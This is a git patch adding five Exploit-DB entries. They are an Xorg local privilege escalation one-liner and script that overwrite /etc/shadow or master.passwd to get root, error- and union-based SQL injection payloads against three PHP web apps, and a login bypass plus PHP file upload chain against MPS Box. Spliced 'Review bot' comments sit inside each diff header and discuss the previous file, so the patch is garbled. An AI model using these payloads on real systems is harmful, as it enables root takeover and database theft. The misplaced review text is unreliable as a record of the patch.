From bbbf700308be45a3b5a6c5efd26335805f2d7af4 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 27 Oct 2018 05:01:46 +0000
Subject: [PATCH] DB: 2018-10-27
5 changes to exploits/shellcodes
xorg-x11-server < 1.20.3 - Local Privilege Escalation
Quick Count 2.0 - 'txtInstID' SQL Injection
MPS Box 0.1.8.0 - Arbitrary File Upload
Delta Sql 1.8.2 - 'id' SQL Injection
Veterinary Clinic Management 00.02 - 'editpetnum' SQL Injection
---
 exploits/multiple/local/45697.txt | 29 +++++++
 exploits/php/webapps/45698.txt | 83 +++++++++++++++++++
 exploits/php/webapps/45699.txt | 130 ++++++++++++++++++++++++++++++
 exploits/php/webapps/45700.txt | 59 ++++++++++++++
 exploits/php/webapps/45701.txt | 86 ++++++++++++++++++++
 files_exploits.csv | 5 ++
 6 files changed, 392 insertions(+)
 create mode 100644 exploits/multiple/local/45697.txt
 create mode 100644 exploits/php/webapps/45698.txt
 create mode 100644 exploits/php/webapps/45699.txt
 create mode 100644 exploits/php/webapps/45700.txt
 create mode 100644 exploits/php/webapps/45701.txt
diff --git a/exploits/multiple/local/45697.txt b/exploits/multiple/local/45697.txt
new file mode 100644
index 000000000..dc9870724
--- /dev/null
+++ b/exploits/multiple/local/45697.txt
@@ -0,0 +1,29 @@
+#CVE-2018-14665 - a LPE exploit via http://X.org fits in a tweet
+
+cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su
+
+Overwrite shadow (or any) file on most Linux, get root privileges. *BSD and any other Xorg desktop also affected.
+
+
+
+
+
+#!/bin/sh
+# local privilege escalation in X11 currently
+# unpatched in OpenBSD 6.4 stable - exploit
+# uses cve-2018-14665 to overwrite files as root.
+# Impacts Xorg 1.19.0 - 1.20.2 which ships setuid
+# and vulnerable in default OpenBSD.
+#
+# - https://hacker.house
+echo [+] OpenBSD 6.4-stable local root exploit
+cd /etc
+Xorg -fp 'root:$2b$08$As7rA9IO2lsfSyb7OkESWueQFzgbDfCXw0JXjjYszKa8Aklt5RTSG:0:0:daemon:0:0:Charlie &:/root:/bin/ksh' -logfile master.passwd :1 &
+sleep 5
+pkill Xorg
+echo [-] dont forget to mv and chmod /etc/master.passwd.old back
+echo [+] type 'Password1' and hit enter for root
+su -
+
+
+EBB Note ~ Another version of it: https://gist.github.com/0x27/d8aae5de44ed385ff2a3d80196907850
\ No newline at end of file
diff --git a/exploits/php/webapps/45698.txt b/exploits/php/webapps/45698.txt
new file mode 100644
index 000000000..9c10f18ba
--- /dev/null
+++ b/exploits/php/webapps/45698.txt
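Review bot: The one-liner gives no preconditions and no recovery step: `cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su` replaces /etc/shadow with an Xorg log, so every other account's hash is gone and a tester is not told how to get it back (the OpenBSD script at least says to move master.passwd.old back; presumably Xorg's log rotation leaves the original as shadow.old on Linux too, but that should be stated rather than assumed). The script comment says the bug needs Xorg 1.19.0–1.20.2 installed setuid root, so a heading note such as `# requires: setuid-root Xorg 1.19.0-1.20.2, a free display (:1), a user allowed to start X; a rootless/wrapper-managed Xorg is presumably not exploitable this way - confirm` would make applicability explicit for the "most Linux" claim. Worth recording for defenders: the Xorg command line literally carries `-logfile shadow` with cwd /etc and the resulting /etc/shadow is an Xorg log, so process-audit logging or file-integrity monitoring on /etc/shadow catches this trivially.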
@@ -0,0 +1,83 @@
+# Exploit Title: Quick Count 2.0 - 'txtInstID' SQL Injection
+# Dork: N/A
+# Date: 2018-10-25
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://quickcount.sourceforge.io/
+# Software Link: https://sourceforge.net/projects/quickcount/files/latest/download
+# Version: 2.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# 1)
+# http://localhost/[PATH]/QCVote.php
+#
+# [PATH]/QCVote.php
+# ....
+# 90 $_SESSION['glbInstID'] = "";
+# 91 if ($_SERVER["REQUEST_METHOD"] == "POST") {
+# 92 // collect value of input field
+# 93 if (isset($_REQUEST['txtInstID'])) {
+# 94 $name = $_REQUEST['txtInstID'];
+# 95 }
+# 96 if (isset($_REQUEST['btnA'])) {
+# 97 $btnAVal = $_REQUEST['btnA'];
+# 98 }
+# 99 if (isset($_REQUEST['btnB'])) {
+# 100 $btnBVal = $_REQUEST['btnB'];
+# 101 }
+# 102 if (isset($_REQUEST['btnC'])) {
+# 103 $btnCVal = $_REQUEST['btnC'];
+# 104 }
+# 105 if (isset($_REQUEST['btnD'])) {
+# 106 $btnDVal = $_REQUEST['btnD'];
+# 107 }
+# 108 if (isset($_REQUEST['btnE'])) {
+# 109 $btnEVal = $_REQUEST['btnE'];
+# 110 }
+# ....
+#
+
+POST /[PATH]/QCVote.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 268
+txtInstID=12'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'
+HTTP/1.1 200 OK
+Date: Thu, 25 Oct 2018 16:35:16 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Set-Cookie: PHPSESSID=q360l936bjohek90ekaj85b0r4; path=/
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 5976
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+# POC:
+# 2)
+# http://localhost/[PATH]/QCAdmin.php
+#
+# [PATH]/QCAdmin.php
+
+Post/txtLogID=&txtLogPW=&txtSC=&txtExpDt=&txtSchName=&txtDept=&btnLogin=Login&txtInstClr=&txtLoginout=LoggedOUT
+
+# ....
+#201 if ($_SERVER["REQUEST_METHOD"] == "POST") {
+#202 // collect value of input field
+#203 if (isset($_REQUEST['txtLogID'])) {
+#204 $txtLogIDVal = $_REQUEST['txtLogID'];
+#205 $_SESSION['glbLogID']=$txtLogIDVal;
+#206 }
+#207 if (isset($_REQUEST['txtLogPW'])) {
+#208 $txtLogPWVal = $_REQUEST['txtLogPW'];
+#209 $_SESSION['glbLogPW'] = $txtLogPWVal;
+# ....Etc....
\ No newline at end of file
diff --git a/exploits/php/webapps/45699.txt b/exploits/php/webapps/45699.txt
new file mode 100644
index 000000000..b1124cd70
--- /dev/null
+++ b/exploits/php/webapps/45699.txt
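Review bot: The QCVote.php excerpt (lines 90–110) shows `$name = $_REQUEST['txtInstID']` being read but stops before the SQL statement that consumes it, so the writeup never shows the sink; quoting the one or two lines where `$name` is interpolated into the query would make the finding verifiable instead of inferred from the error-based payload (the `FLOOR(RAND(0)*2)` / `GROUP BY` duplicate-key trick, which also presumes MySQL/MariaDB and should say so). Because the value is read through `$_REQUEST`, the same payload should also work via GET or a cookie rather than only the POST shown — worth one line, since it changes how the issue is detected and filtered. The second PoC for QCAdmin.php is not a proof of concept: it shows `txtLogID`/`txtLogPW` copied into `$_SESSION` plus a bare parameter list, with no payload, no response and no query, so either include the injected request or drop it. A remediation line — `use prepared statements / bound parameters for every value taken from $_REQUEST` — is standard for these entries and is missing.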
@@ -0,0 +1,130 @@
+# Exploit Title: MPS Box 0.1.8.0 - Arbitrary File Upload
+# Dork: N/A
+# Date: 2018-10-25
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://www.mpsbox.com/
+# Software Link: https://sourceforge.net/projects/mpsbox/files/latest/download
+# Version: 0.1.8.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# 1)
+# http://localhost/[PATH]/device_add.php
+#
+# http://localhost/[PATH]/tmp/[FILE]
+#
+# [PATH]/device_add.php
+# ....
+# 51 if(isset($_POST['upload'])) {
+# 52
+# 53 $uploaddir = realpath(dirname(__FILE__)) . '/tmp/';
+# 54 $uploadfile = $uploaddir . basename($_FILES['files_to_upload']['name']);
+# 55
+# 56 if (move_uploaded_file($_FILES['files_to_upload']['tmp_name'], $uploadfile)) {
+# 57 // $_SESSION['status'] = "File is valid, and was successfully uploaded.\n";
+# 58
+# 59 $file_handle = fopen($uploadfile, "r");
+# 60 while (!feof($file_handle) ) {
+# 61 $line_of_text = fgetcsv($file_handle, 1024);
+# 62 if(!empty($line_of_text[0])) {
+# 63 device_queue_add('new','',"$line_of_text[0]","$line_of_text[1]",'','1');
+# 64 }
+# 65 }
+# ....
+
+POST /[PATH]/login_page.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/[PATH]/login_page.php
+Cookie: PHPSESSID=c1lc3729cfh58b72udo055urg7
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 85
+username=%27or+1%3D1+or+%27%27%3D%27&password=%27or+1%3D1+or+%27%27%3D%27&login=Login
+HTTP/1.1 302 Found
+Date: Thu, 25 Oct 2018 13:34:44 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Location: http://localhost/[PATH]/device_add.php
+Content-Length: 5652
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+
+POST http://localhost/[PATH]/device_add.php HTTP/1.1
+Host: 192.168.1.27
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=c1lc3729cfh58b72udo055urg7
+Connection: keep-alive
+Content-Type: multipart/form-data; boundary=
+---------------------------20568543311864623172004480142
+Content-Length: 509
+-----------------------------20568543311864623172004480142
+Content-Disposition: form-data; name="files_to_upload"; filename="phpinfo.php"
+Content-Type: application/force-download
+
+-----------------------------20568543311864623172004480142
+Content-Disposition: form-data; name="MAX_FILE_SIZE"
+100000
+-----------------------------20568543311864623172004480142
+Content-Disposition: form-data; name="upload"
+Upload
+-----------------------------20568543311864623172004480142--
+HTTP/1.1 302 Found
+Date: Thu, 25 Oct 2018 13:35:07 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Location: device_upd.php
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
+
+
+GET http://localhost/[PATH]/tmp/phpinfo.php HTTP/1.1
+Host: 192.168.1.27
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=c1lc3729cfh58b72udo055urg7
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Thu, 25 Oct 2018 13:35:38 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
+
+
+
+
+
+
+CSV file template +
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/45700.txt b/exploits/php/webapps/45700.txt
new file mode 100644
index 000000000..1d41c5870
--- /dev/null
+++ b/exploits/php/webapps/45700.txt
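Review bot: The multipart part with `filename="phpinfo.php"` has an empty body in the text — nothing sits between `Content-Type: application/force-download` and the next boundary — so as printed the PoC uploads a zero-byte file and the closing `GET /tmp/phpinfo.php` proves nothing; the PHP payload was presumably stripped along with the rest of the HTML when the file was rendered (the stray `CSV file template` fragment and the `Content-Length: 509` both suggest a longer original) and should be restored, e.g. `<?php phpinfo(); ?>`. The first request is itself a separate vulnerability: `username=' or 1=1 or ''='` against login_page.php answers with a 302 to device_add.php, i.e. an authentication-bypass SQL injection that neither the title nor the CSV entry names and that makes the upload reachable with no credentials. The excerpt does pin the root cause — line 54 uses `basename()` (no traversal) but there is no extension or content check before `move_uploaded_file` into the web-served `tmp/` — so a remediation line (server-side extension allowlist, random stored name, store outside the document root) would complete the entry. Minor: `Host:` alternates between `TARGET` and `192.168.1.27` across the three requests; pick one.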
@@ -0,0 +1,59 @@
+# Exploit Title: Delta Sql 1.8.2 - 'id' SQL Injection
+# Dork: N/A
+# Date: 2018-10-25
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://deltasql.sourceforge.net/
+# Software Link: https://sourceforge.net/projects/deltasql/files/latest/download
+# Software Link: http://deltasql.sourceforge.net/deltasql/
+# Version: 1.8.2
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# 1)
+# http://localhost/[PATH]/docs_manage.php?id=[SQL]&version=1&hasdocs=1
+
+GET /[PATH]/docs_manage.php?id=1++uNiOn+seleCt+0x31,0x32,(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),0x34,0x35--+-&version=1&hasdocs=1 HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=ra5c0bgati64a01fag01l8hhf0
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Thu, 24 Oct 2018 00:12:57 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
+
+# POC:
+# 2)
+# http://localhost/[PATH]/list_project_modules.php?id=[SQL]&name=1
+
+GET /[PATH]/list_project_modules.php?id=-1%20union%20select%20null,(0x32),null--&name=1 HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=ra5c0bgati64a01fag01l8hhf0
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Thu, 24 Oct 2018 00:08:03 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 2150
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
\ No newline at end of file
diff --git a/exploits/php/webapps/45701.txt b/exploits/php/webapps/45701.txt
new file mode 100644
index 000000000..e92dca216
--- /dev/null
+++ b/exploits/php/webapps/45701.txt
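Review bot: Unlike the other entries in this batch, this writeup quotes none of the vulnerable code, so nothing ties the `id` parameter of docs_manage.php or list_project_modules.php to an unparameterized query; the requests are the only evidence, and the second one (`id=-1 union select null,(0x32),null--`) shows neither extracted data nor an error, so it does not demonstrate anything on its own. Both requests carry `Cookie: PHPSESSID=...` but the text never says whether these pages require a logged-in session, which decides whether this is pre- or post-authentication and therefore its severity — a single `# Authentication: required/not required` line would settle it. The first payload also presumes MySQL/MariaDB (INFORMATION_SCHEMA.COLUMNS, `@x:=` user variables, the `-- ` comment in `0x34,0x35--+-`); stating the backend, and the column count the `UNION SELECT` was tuned to (5 and 3), helps anyone reproducing against another build.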
@@ -0,0 +1,86 @@
+# Exploit Title: Veterinary Clinic Management 00.02 - 'editpetnum' SQL Injection
+# Dork: N/A
+# Date: 2018-10-25
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://vetclinic.sourceforge.io/
+# Software Link: https://sourceforge.net/projects/vetclinic/files/latest/download
+# Version: 00.02
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# 1)
+# http://localhost/[PATH]/petmaint.php?editpetnum=[SQL]
+#
+# [PATH]/petmaint.php
+# ....
+#154 $editpetnum = "";
+#155
+#156 if(isset($_POST["editpetnum"])) {
+#157 $editpetnum = $_POST["editpetnum"];
+#158 unset($_POST["editpetnum"]);
+#159 }
+#160 else if(isset($_GET["editpetnum"])) {
+#161 $editpetnum = $_GET["editpetnum"];
+#162 unset($_GET["editpetnum"]);
+#163 }
+# ....
+
+GET /[PATH]/petmaint.php?editpetnum=-0x496873616e2053656e63616e+UniOn++SeLect++0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2cCONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()))%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e--+Efe HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Thu, 25 Oct 2018 22:18:01 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Set-Cookie: PHPSESSID=8dts9gt545rgn1f5i4pgn573a3; path=/
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
+
+# POC:
+# 2)
+# http://localhost/[PATH]/procmaint.php?proccode=[SQL]
+#
+# [PATH]/procmaint.php
+# ....
+#28 require_once "includes/common.inc";
+#29 $emplnumber = $_SESSION['employeenumber'];
+#30 $display = "ProcMaint:".$emplnumber;
+#31 if(isset($_GET["proccode"])) {
+#32 $proccode = $_GET["proccode"];
+#33 } else {
+#34 $proccode = "";
+#35 }
+#36 if ($proccode == "")
+#37 {
+# ....
+
+GET /[PATH]/procmaint.php?proccode=%27%27%27%27+unioN+selECt++nuLL,nuLL,nuLL,conCAT(0x496873616e2053656e63616e),nuLL--+Efe HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=8dts9gt545rgn1f5i4pgn573a3
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Thu, 25 Oct 2018 22:22:33 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 2697
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index c5fd75fc0..61af09461 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
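Review bot: Both code excerpts stop short of the sink: petmaint.php lines 154–163 show `$editpetnum` taken from `$_POST` or `$_GET`, and procmaint.php lines 28–37 stop at `if ($proccode == "")`, so neither query that interpolates these values is visible and the 15-column and 5-column `UNION SELECT`s remain unverified guesses; quoting the offending SQL line in each file is what makes the finding checkable. The second PoC is a distinct parameter (`proccode` in procmaint.php) that neither the title nor the CSV description (`'editpetnum' SQL Injection`) covers — either broaden the title or index it as its own entry. The first request is sent with no Cookie at all, while procmaint.php reads `$_SESSION['employeenumber']` right after `require_once "includes/common.inc"`; whether either page enforces a login is not stated and should be, since it is the difference between a pre-auth and post-auth issue.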
@@ -10053,6 +10053,7 @@ id,file,description,date,author,type,platform,port
 45675,exploits/windows/local/45675.md,"Microsoft Data Sharing - Local Privilege Escalation (PoC)",2018-10-23,SandboxEscaper,local,windows,
 45687,exploits/windows_x86/local/45687.txt,"Adult Filter 1.0 - Buffer Overflow (SEH)",2018-10-25,AkkuS,local,windows_x86,
 45696,exploits/windows/local/45696.rb,"WebEx - Local Service Permissions Exploit (Metasploit)",2018-10-25,Metasploit,local,windows,
+45697,exploits/multiple/local/45697.txt,"xorg-x11-server < 1.20.3 - Local Privilege Escalation",2018-10-25,"Hacker Fantastic",local,multiple,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -40209,3 +40210,7 @@ id,file,description,date,author,type,platform,port
 45691,exploits/php/webapps/45691.txt,"AjentiCP 1.2.23.13 - Cross-Site Scripting",2018-10-25,"Numan OZDEMIR",webapps,php,
 45692,exploits/php/webapps/45692.txt,"MPS Box 0.1.8.0 - 'uuid' SQL Injection",2018-10-25,"Ihsan Sencan",webapps,php,80
 45693,exploits/php/webapps/45693.txt,"Open STA Manager 2.3 - Arbitrary File Download",2018-10-25,"Ihsan Sencan",webapps,php,
+45698,exploits/php/webapps/45698.txt,"Quick Count 2.0 - 'txtInstID' SQL Injection",2018-10-26,"Ihsan Sencan",webapps,php,
+45699,exploits/php/webapps/45699.txt,"MPS Box 0.1.8.0 - Arbitrary File Upload",2018-10-26,"Ihsan Sencan",webapps,php,
+45700,exploits/php/webapps/45700.txt,"Delta Sql 1.8.2 - 'id' SQL Injection",2018-10-26,"Ihsan Sencan",webapps,php,
+45701,exploits/php/webapps/45701.txt,"Veterinary Clinic Management 00.02 - 'editpetnum' SQL Injection",2018-10-26,"Ihsan Sencan",webapps,php,
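Review bot: The four new webapps rows are dated 2018-10-26 while each indexed file's own `# Date:` header says 2018-10-25; one side should be corrected so the index and the files agree (45697 carries no date header, so its 2018-10-25 is presumably the submission date and is fine). The neighbouring 45692 row records port 80 for an MPS Box web issue, yet the new 45699 MPS Box row leaves the port column empty, as do the other three web entries — presumably `80` was intended for consistency with the earlier row.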